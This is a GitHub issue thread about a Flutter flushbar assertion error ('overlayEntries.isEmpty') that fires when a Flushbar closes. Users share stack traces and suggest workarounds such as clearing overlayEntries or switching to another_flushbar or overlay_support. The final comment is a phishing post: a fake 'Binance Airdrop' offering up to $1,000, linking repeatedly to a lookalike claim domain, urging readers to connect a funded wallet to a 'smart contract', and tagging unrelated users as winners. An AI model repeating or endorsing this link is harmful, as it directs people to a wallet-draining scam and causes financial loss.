### ISSUE TITLE
'package:flushbar/flushbar_route.dart': Failed assertion: line 308 pos 18: 'overlayEntries.isEmpty': is not true.

### ISSUE THREAD

**Issue by liudonghua123** [AndreHaueisen/flushbar#160]
**Describe the bug**

I just invoke the following code snippet in a onPressed callback of button.

```dart
                                  var flushbar = Flushbar(
                                    title: '操作结果',
                                    message: '${userDetail.username} 下线成功',
                                    backgroundColor: Colors.green,
                                    flushbarStyle: FlushbarStyle.GROUNDED,
                                    duration: Duration(seconds: 1),
                                  );
                                  await flushbar.show(context);
```

**Paste relevant code**

```dart
                            RaisedButton(
                              color: Colors.blue,
                              child: Text(
                                '下线',
                                style: defaultWhiteTextStyle,
                              ),
                              onPressed: () async {
                                var result = true;
                                if (result) {
                                  var flushbar = Flushbar(
                                    title: '操作结果',
                                    message: '${userDetail.username} 下线成功',
                                    backgroundColor: Colors.green,
                                    flushbarStyle: FlushbarStyle.GROUNDED,
                                    duration: Duration(seconds: 1),
                                  );
                                  await flushbar.show(context);
                                } else {
                                  Flushbar(
                                    title: '操作结果',
                                    message: '${userDetail.username} 下线失败',
                                    backgroundColor: Colors.red,
                                    flushbarStyle: FlushbarStyle.GROUNDED,
                                    duration: Duration(seconds: 1),
                                  )..show(context);
                                }
                              },
                            ),
```

**More detailed logs**

```shell
════════ Exception caught by animation library ═════════════════════════════════
The following assertion was thrown while notifying status listeners for AnimationController:
'package:flushbar/flushbar_route.dart': Failed assertion: line 308 pos 18: 'overlayEntries.isEmpty': is not true.

When the exception was thrown, this was the stack
#2      FlushbarRoute._handleStatusChanged
package:flushbar/flushbar_route.dart:308
#3      AnimationLocalStatusListenersMixin.notifyStatusListeners
package:flutter/…/animation/listener_helpers.dart:199
#4      AnimationController._checkStatusChanged
package:flutter/…/animation/animation_controller.dart:795
#5      AnimationController._tick
package:flutter/…/animation/animation_controller.dart:811
#6      Ticker._tick
package:flutter/…/scheduler/ticker.dart:238
...
The AnimationController notifying status listeners was: AnimationController#8dc1d(⏮ 0.000; paused; for FlushbarRoute<dynamic>)
════════════════════════════════════════════════════════════════════════════════

════════ Exception caught by animation library ═════════════════════════════════
'package:flushbar/flushbar_route.dart': Failed assertion: line 308 pos 18: 'overlayEntries.isEmpty': is not true.
════════════════════════════════════════════════════════════════════════════════

```

**Comment by dimple3695** [comment]
Having same issue. @liudonghua123 Have you got any solution?

**Comment by rokk4** [comment]
Also with me.
But snackbar is shown like it should.
```
                      FlushbarHelper.createError(
                        message: failure.map(
                          cancelledByUser: (_) => 'Cancelled',
                          serverError: (_) => 'Server error',
                          emailAlreadyInUse: (_) => 'Email already in use',
                          invalidEmailAndPasswordCombination: (_) =>
                              'Invalid email and password combination',
                        ),
                      ).show(context)
```
```
Results in:

════════ Exception caught by animation library ═════════════════════════════════════════════════════
The following assertion was thrown while notifying status listeners for AnimationController:
'package:flushbar/flushbar_route.dart': Failed assertion: line 308 pos 18: 'overlayEntries.isEmpty': is not true.

When the exception was thrown, this was the stack: 
#2      FlushbarRoute._handleStatusChanged (package:flushbar/flushbar_route.dart:308:18)
#3      AnimationLocalStatusListenersMixin.notifyStatusListeners (package:flutter/src/animation/listener_helpers.dart:199:19)
#4      AnimationController._checkStatusChanged (package:flutter/src/animation/animation_controller.dart:795:7)
#5      AnimationController._tick (package:flutter/src/animation/animation_controller.dart:811:5)
#6      Ticker._tick (package:flutter/src/scheduler/ticker.dart:238:12)
...
The AnimationController notifying status listeners was: AnimationController#82bcc(⏮ 0.000; paused; for FlushbarRoute<dynamic>)
════════════════════════════════════════════════════════════════════════════════════════════════════

```

**Comment by liudonghua123** [comment]
@dimple3695 Hi, I did not find a solution, and finally I changed to another package https://pub.dev/packages/overlay_support.

**Comment by Zony-Zhao** [comment]
same Problem here!

**Comment by wojtekoziol** [comment]
Same issue :(

**Comment by fsteenkamp** [comment]
Same issue for me, seems to be working fine but the error is annoying

**Comment by wojtekoziol** [comment]
Same issue here. Works fine, but throws an error when Flushbar is hiding

**Comment by jhb-dev** [comment]
I have the same issue. Works fine until the Flushbar is closed. 

```
The following assertion was thrown while notifying status listeners for AnimationController:
'package:flushbar/flushbar_route.dart': Failed assertion: line 308 pos 18: 'overlayEntries.isEmpty': is not true.

When the exception was thrown, this was the stack: 
#2      FlushbarRoute._handleStatusChanged (package:flushbar/flushbar_route.dart:308:18)
#3      AnimationLocalStatusListenersMixin.notifyStatusListeners (package:flutter/src/animation/listener_helpers.dart:199:19)
#4      AnimationController._checkStatusChanged (package:flutter/src/animation/animation_controller.dart:795:7)
#5      AnimationController._tick (package:flutter/src/animation/animation_controller.dart:811:5)
#6      Ticker._tick (package:flutter/src/scheduler/ticker.dart:238:12)
...
The AnimationController notifying status listeners was: AnimationController#abf7a(⏮ 0.000; paused; for FlushbarRoute<dynamic>)
```

**Comment by otopba** [comment]
I have same issue

**Comment by ghost** [comment]
Bye flushbar, hi overlay_support.
https://pub.dev/packages/overlay_support

**Comment by cmdrootaccess** [comment]
Clone the code and insert this line 
```
if(overlayEntries.isNotEmpty){
       overlayEntries.clear();
}
  assert(overlayEntries.isEmpty);
```

at

https://github.com/AndreHaueisen/flushbar/blob/master/lib/flushbar_route.dart#L307

**Comment by jhb-dev** [comment]
@cmdrootaccess Thanks for the code snippet. It works! 😀😀

**Comment by Vinzent03** [comment]
@cmdrootaccess Would you mind to open a pull request? Although if I see the activity of the package owner I dont think it will merged right?

**Comment by cmdrootaccess** [comment]
right. i will be making further development at https://github.com/cmdrootaccess/another-flushbar

**Comment by cmdrootaccess** [comment]
please use another_flushbar: ^1.10.5 . same code just fixed this issue

**Comment by jhb-dev** [comment]
Thank you for fixing the bug and publishing the fixed package @cmdrootaccess 😀

**Comment by serkanayaz** [comment]
I solved for me
Use overlay_support instead of flushbar
https://pub.dev/packages/overlay_support

**Comment by edufolly** [comment]
Same problem.

**Comment by vipinnegi90** [comment]
> 
> 
> please use another_flushbar: ^1.10.5 . same code just fixed this issue

where is it published? I still see 1.10.4 in pub.dev.

**Comment by cmdrootaccess** [comment]
@vipinnegi90 https://pub.dev/packages/another_flushbar

**Comment by jonasN5** [comment]
> please use another_flushbar: ^1.10.5 . same code just fixed this issue

Awesome!

**Comment by vipinnegi90** [comment]
> @vipinnegi90 https://pub.dev/packages/another_flushbar

oh, there is another flushbar called another_flushbar .. wow >.<

**Comment by IvanPavliuk** [comment]
Any update on it?

**Comment by mellowcello77** [comment]
Which is better, overlay support or another flushbar?

**Comment by mcz9mm** [comment]
I replaced it with [another_flushbar](https://pub.dev/packages/another_flushbar).
I had to change the import, but the other parts inherited the flushbar settings, so there were few parameter modifications.

> Which is better, overlay support or another flushbar?

**Comment by fuadrivai** [comment]
> please use another_flushbar: ^1.10.5 . same code just fixed this issue

thanks, it works fine.
i use same code as like before, just change dependency and borderRadius behavior.

**Comment by YawarOsman** [comment]
> Bye flushbar, hi overlay_support.
> https://pub.dev/packages/overlay_support

and then what should i use  instread of 'onStatusChanged' ??????

**Comment by jayeshpansheriya** [comment]
you can also use https://pub.dev/packages/awesome_extensions, with some extra feature and with extension, as well as null safety support.

**Comment by meimid** [comment]
> another_flushbar

good

**Comment by Nishore-Dev** [comment]
> Clone the code and insert this line
> 
> ```
> if(overlayEntries.isNotEmpty){
>        overlayEntries.clear();
> }
>   assert(overlayEntries.isEmpty);
> ```
> 
> at
> 
> https://github.com/AndreHaueisen/flushbar/blob/master/lib/flushbar_route.dart#L307

it works ....

**Comment by Hamza-ye** [comment]
I have the same issue here, I couldn't solve it, I had to move to another library called **another_flushbar**, I previously had an issue with **unsound-null-safety**!

**Comment by manuvb67** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://claim.bnbchainnetwork.xyz/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://claim.bnbchainnetwork.xyz/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @SeriousMarc, @kidzik, @housiqi66, @keeganskeate, @perrornet, @ksetherg, @KBJIYU
